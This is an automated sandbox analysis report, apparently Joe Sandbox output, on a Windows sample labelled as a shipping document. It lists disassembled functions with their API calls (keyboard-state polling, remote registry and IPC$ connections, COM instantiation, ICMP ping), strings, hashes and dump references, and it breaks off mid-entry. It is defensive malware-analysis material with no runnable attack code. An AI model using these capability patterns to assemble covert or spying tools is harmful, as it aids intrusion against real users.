Opcode Fuzzy Hash: 15b69ac9e33882857d299e1ee1bec485863cd37babe541d666904623644cc115
Instruction Fuzzy Hash: 7D5101B1E01619AFDF18CF68DD89AAEBBB6FB49710F108129F915E7290D7709D00DB90

Function 00F5A142 Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5A4D7: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00F5A15D,?,00000000,?,?,?,?,00F5A12F,00000000,?), ref: 00F5A53A

DestroyWindow.USER32(?), ref: 00F5A1F6
KillTimer.USER32(00000000,?,?,?,?,00F5A12F,00000000,?), ref: 00F5A290
DestroyAcceleratorTable.USER32(00000000), ref: 00F973C6
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00F5A12F,00000000,?), ref: 00F973F4
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00F5A12F,00000000,?), ref: 00F9740B
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00F5A12F,00000000), ref: 00F97427
DeleteObject.GDI32(00000000), ref: 00F97439

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 3578ad1961be59132571d7a4a87e245da43734c64c0abd0b922b79372dc5e7d8
Instruction ID: e2dc422eeebc71fb03ae74430858c0a01758b0ca26c6ee7cd6f29f5bb613ed3a
Opcode Fuzzy Hash: 3578ad1961be59132571d7a4a87e245da43734c64c0abd0b922b79372dc5e7d8
Instruction Fuzzy Hash: 2861B131905701DFDB35DF28D949B257BF2FB40322F140619EA8287964C37AA9A4FF82

Function 00F5ACB8 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00F5ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00F5ADD2

GetSysColor.USER32(0000000F), ref: 00F5ACE2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: bb0361dfbf962316bca45ce617c79fea76fbb4d678a523c1701fb68bb34277a7
Instruction ID: 187884ceff8c4256799f33c3a2dd8c1736fb5ec947a37af395abc4d37f5641f5
Opcode Fuzzy Hash: bb0361dfbf962316bca45ce617c79fea76fbb4d678a523c1701fb68bb34277a7
Instruction Fuzzy Hash: 3741ED32505705AFDB206B38DC48BB937B6AB02332F140346FEA28B2E1C6319C51FB52

Function 00FA9600 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F903D3,?,0000138C,?,?,?,?,00000000,?), ref: 00FA9635
LoadStringW.USER32(00000000,?,00F903D3,?), ref: 00FA963E

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,00F903D3,?,0000138C,?,?,?,?,00000000,?,?), ref: 00FA9660
LoadStringW.USER32(00000000,?,00F903D3,?), ref: 00FA9663
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FA9784

Strings

Line %d:, xrefs: 00FA96BE
Error: , xrefs: 00FA973B
%s (%d) : ==> %s: %s %s, xrefs: 00FA9768
Line %d (File "%s"):, xrefs: 00FA96AD
^ ERROR, xrefs: 00FA9719

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 3c876299af22aaafc3dfd35ad8ac319a6ab0f01fc2518e9c00454623abee2089
Instruction ID: a2021df0518f76ce73655935752fec5774b75ad7842a2d3322424354ee5cf7c0
Opcode Fuzzy Hash: 3c876299af22aaafc3dfd35ad8ac319a6ab0f01fc2518e9c00454623abee2089
Instruction Fuzzy Hash: 77413B72800209ABDB04FFE0CD86DEE7B79AF55701F100065F90576092EBA96F49EB61

Function 00FA05C7 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FA068B
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FA06A7
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FA06C3
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FA06ED
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00FA0715
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0720
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FA0725

Strings

\CLSID, xrefs: 00FA060D
SOFTWARE\Classes\, xrefs: 00FA05F7
\IPC$, xrefs: 00FA066D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 01509890e3d8f1044a6596c4d206a6db890144fa3d01f5b36b5c4b16a48e8695
Instruction ID: b53e323901b8b52547a0a9de2fe06956fbcd80fa827bb7de091b9361ae191d91
Opcode Fuzzy Hash: 01509890e3d8f1044a6596c4d206a6db890144fa3d01f5b36b5c4b16a48e8695
Instruction Fuzzy Hash: C5410772C1122DABDF11EFA4DC95CEEBB78BF54750F00412AE805A6161EB749E04EF90

Function 00FC3B57 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FC3B83
CoInitialize.OLE32(00000000), ref: 00FC3BB1
CoUninitialize.OLE32 ref: 00FC3BBB
_wcslen.LIBCMT ref: 00FC3C54
GetRunningObjectTable.OLE32(00000000,?), ref: 00FC3CD8
SetErrorMode.KERNEL32(00000001,00000029), ref: 00FC3DFC
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00FC3E35
CoGetObject.OLE32(?,00000000,00FDFBB4,?), ref: 00FC3E54
SetErrorMode.KERNEL32(00000000), ref: 00FC3E67
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FC3EEB
VariantClear.OLEAUT32(?), ref: 00FC3EFF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 1f83bf1303f4552ca1ac6b3ccb93001bc520cba6ccb8b314ae87efde0856cbd1
Instruction ID: f010be71412a3dcee436ccc2310bf274ab9ee1a0147b55d07665c1609de2bb33
Opcode Fuzzy Hash: 1f83bf1303f4552ca1ac6b3ccb93001bc520cba6ccb8b314ae87efde0856cbd1
Instruction Fuzzy Hash: 93C137716042069FC700DF28C985E2BBBE9FF89794F10891DF9869B251DB31EE05DB92

Function 00FB79B4 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00FB7A11
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00FB7AAD
SHGetDesktopFolder.SHELL32(?), ref: 00FB7AC1
CoCreateInstance.OLE32(00FDFD24,00000000,00000001,01006E7C,?), ref: 00FB7B0D
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00FB7B92
CoTaskMemFree.OLE32(?,?), ref: 00FB7BEA
SHBrowseForFolderW.SHELL32(?), ref: 00FB7C75
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00FB7C98
CoTaskMemFree.OLE32(00000000), ref: 00FB7C9F
CoTaskMemFree.OLE32(00000000), ref: 00FB7CF4
CoUninitialize.OLE32 ref: 00FB7CFA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: feff6655e3ee85d4f9cd5be3e06b0da1356847c3591aefe56b856e20203fc498
Instruction ID: eac31ddb5ecfcbc8a0735f51b43653e95746204692360e3d048056efa6b75790
Opcode Fuzzy Hash: feff6655e3ee85d4f9cd5be3e06b0da1356847c3591aefe56b856e20203fc498
Instruction Fuzzy Hash: 89C11975A00209AFCB14EFA5C884DAEBBF9FF48314B148499E916DB261D730EE45DF90

Function 00FD5352 Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00FD5439
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD544A
CharNextW.USER32(00000158), ref: 00FD5479
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00FD54BA
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00FD54D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00FD54E1

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 37997e13d851ba06f88959a356a12d1f7a19642d1a3aecbd8aa489c14633f5ab
Instruction ID: 47b45bf4638916a2a206c5c60b73392d9c96beb9f8aaae36f7ef151160699964
Opcode Fuzzy Hash: 37997e13d851ba06f88959a356a12d1f7a19642d1a3aecbd8aa489c14633f5ab
Instruction Fuzzy Hash: 0861AF71901609ABDB10DF64CC84EFE7BBBEB06B61F18410AF9259B390C7749941FBA1

Function 00F9F971 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F9F998
SafeArrayAllocData.OLEAUT32(?), ref: 00F9F9F1
VariantInit.OLEAUT32(?), ref: 00F9FA03
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F9FA23
VariantCopy.OLEAUT32(?,?), ref: 00F9FA76
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F9FA8A
VariantClear.OLEAUT32(?), ref: 00F9FA9F
SafeArrayDestroyData.OLEAUT32(?), ref: 00F9FAAC
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F9FAB5
VariantClear.OLEAUT32(?), ref: 00F9FAC7
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F9FAD2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e8eb37beb8fe5edbf4fb0c787afef33a8fa198863757488a8b471f389dcd103b
Instruction ID: b6eecca9cb0a34c903f10b10d166d4b04be27af76d0e2e5adbc98e4957ac56b5
Opcode Fuzzy Hash: e8eb37beb8fe5edbf4fb0c787afef33a8fa198863757488a8b471f389dcd103b
Instruction Fuzzy Hash: 76415E35A01219EFDF00DFA8CC549ADBBB9FF49354F008029E955E7261C774AA49DBA0

Function 00FA9B97 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00FA9BBF
GetAsyncKeyState.USER32(000000A0), ref: 00FA9C40
GetKeyState.USER32(000000A0), ref: 00FA9C5B
GetAsyncKeyState.USER32(000000A1), ref: 00FA9C75
GetKeyState.USER32(000000A1), ref: 00FA9C8A
GetAsyncKeyState.USER32(00000011), ref: 00FA9CA2
GetKeyState.USER32(00000011), ref: 00FA9CB4
GetAsyncKeyState.USER32(00000012), ref: 00FA9CCC
GetKeyState.USER32(00000012), ref: 00FA9CDE
GetAsyncKeyState.USER32(0000005B), ref: 00FA9CF6
GetKeyState.USER32(0000005B), ref: 00FA9D08

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c0e11240862065daeb1b318c2788852112868abef911125a9bc1d6080a559973
Instruction ID: 4b890812f10b3748aa1ac31158c4d44655a67f0cbdaeca8c1daa7bd4631031e6
Opcode Fuzzy Hash: c0e11240862065daeb1b318c2788852112868abef911125a9bc1d6080a559973
Instruction Fuzzy Hash: 2941E4A0D0CBCB6DFF30876498043A5BEE1AF13364F18806AC5C6565C2DBE499C4E7A2

Function 00FA4179 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 239COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00FDD0D0,?,?), ref: 00FA4212

Part of subcall function 00FA3F58: CharUpperBuffW.USER32(?,?,00000000,00FDD0D0,?,?,00000001,?,?,00FA4286,?,?,?,?,00000000,00FDD0D0), ref: 00FA3FE5

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA437B

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharForegroundUpperWindow
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 1486467469-1994484594
Opcode ID: 357d77ff4b6037d11f118866ee54ff86beeb77f10a5c26299568ca22fc5094c0
Instruction ID: 68f0399792879e4e31fe06a2bf3ca92cbf107fd9e50926caf20e65431d8bc07e
Opcode Fuzzy Hash: 357d77ff4b6037d11f118866ee54ff86beeb77f10a5c26299568ca22fc5094c0
Instruction Fuzzy Hash: 8181E3B2A043029BCB14DF79C88096AB7E1BFD6320B504629F456C7680EBB4FD45FB91

Function 00FC0482 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FC04E3
inet_addr.WSOCK32(?), ref: 00FC0543
gethostbyname.WSOCK32(?), ref: 00FC054F
IcmpCreateFile.IPHLPAPI ref: 00FC055D
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC05ED
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00FC060C
IcmpCloseHandle.IPHLPAPI(?), ref: 00FC06E0
WSACleanup.WSOCK32 ref: 00FC06E6

Strings

Ping, xrefs: 00FC059D

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: f9cff393fe89d0970af967f8244da349ed3a693f31a968826653b45ec70bafc4
Instruction ID: 45cb524079d57d70093d5deb4ab5139b5c2f385b044b98226cf88391d913028c
Opcode Fuzzy Hash: f9cff393fe89d0970af967f8244da349ed3a693f31a968826653b45ec70bafc4
Instruction Fuzzy Hash: E7919271A04202DFD720DF15C985F16BBE1AF84328F1485ADF4698B6A2CB34ED46EF81

Function 00FC8BFA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00FC8C1A

Part of subcall function 00FA8DAA: _wcslen.LIBCMT ref: 00FA8DCD

_wcslen.LIBCMT ref: 00FC8C75
_wcslen.LIBCMT ref: 00FC8CC3
_wcslen.LIBCMT ref: 00FC8D03
_wcslen.LIBCMT ref: 00FC8D95

Strings

winapi, xrefs: 00FC8CBD, 00FC8CC2
stdcall, xrefs: 00FC8CFD, 00FC8D02
none, xrefs: 00FC8D8C, 00FC8D91
cdecl, xrefs: 00FC8C6F, 00FC8C74

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: de8dc9051ead92b2c63fbe2927a779d2dc1ed45ae0228e0bdae572fc44cb454c
Instruction ID: e68721e2143b7c6b10b883d6b613fd5c671f41ac545e6a47c0c3935b7710f125
Opcode Fuzzy Hash: de8dc9051ead92b2c63fbe2927a779d2dc1ed45ae0228e0bdae572fc44cb454c
Instruction Fuzzy Hash: 8A51C431A001179BCB14DFACCA52ABDB7B5AF653A0B20422DE866D72C4DF35DD42E790

Function 00FC3653 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00FC369B
CoUninitialize.OLE32 ref: 00FC36A6
CoCreateInstance.OLE32(?,00000000,00000017,00FDFB94,?), ref: 00FC3700
IIDFromString.OLE32(?,?), ref: 00FC3773
VariantInit.OLEAUT32(?), ref: 00FC380B
VariantClear.OLEAUT32(?), ref: 00FC385D

Strings

Invalid parameter, xrefs: 00FC378C
Failed to create object, xrefs: 00FC370B, 00FC37C1
NULL Pointer assignment, xrefs: 00FC3745

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 142ef458f69c797c036cb0a2e426e9445479cb0d43b4a655f5774a3a01dbd3e9
Instruction ID: f73c025bfc4a006576556604b6db6591537c07da794d53fc6b2feb3aff67c202
Opcode Fuzzy Hash: 142ef458f69c797c036cb0a2e426e9445479cb0d43b4a655f5774a3a01dbd3e9
Instruction Fuzzy Hash: 3B61D2B1608302AFD710DF64C94AF5ABBE4EF45750F00880DF9859B291C774EE48EB92

Function 00FA4543 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FA4296
_wcslen.LIBCMT ref: 00FA42F0
_wcslen.LIBCMT ref: 00FA4337
_wcslen.LIBCMT ref: 00FA454C

Strings

REGEXPTITLE, xrefs: 00FA4375, 00FA437A
ACTIVE, xrefs: 00FA42EB, 00FA42FC
HANDLE, xrefs: 00FA4331, 00FA4336
LAST, xrefs: 00FA4291, 00FA42B2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
API String ID: 176396367-1994484594
Opcode ID: 95d379e0826d670acfa9b30fbb9f77fa68ea2f20d89c057124bda5de5607d5ee
Instruction ID: 5e04faba0b76ef52892f6cdb2c3d30bd7e398f90f5e665806065f928b7f3eae7
Opcode Fuzzy Hash: 95d379e0826d670acfa9b30fbb9f77fa68ea2f20d89c057124bda5de5607d5ee
Instruction Fuzzy Hash: 035124B2F103224B8B249E79C98453B73E1BFD7760B60052DE88197684FBA0FD45B7A1

Function 00FB32A6 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00FB32ED

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FB330E

Strings

Error: , xrefs: 00FB33EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00FB3422
Incorrect parameters to object property !, xrefs: 00FB33C9
^ ERROR , xrefs: 00FB33BC
Line %d (File "%s"):, xrefs: 00FB3361, 00FB337A
"%s" (%d) : ==> %s:, xrefs: 00FB3440

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
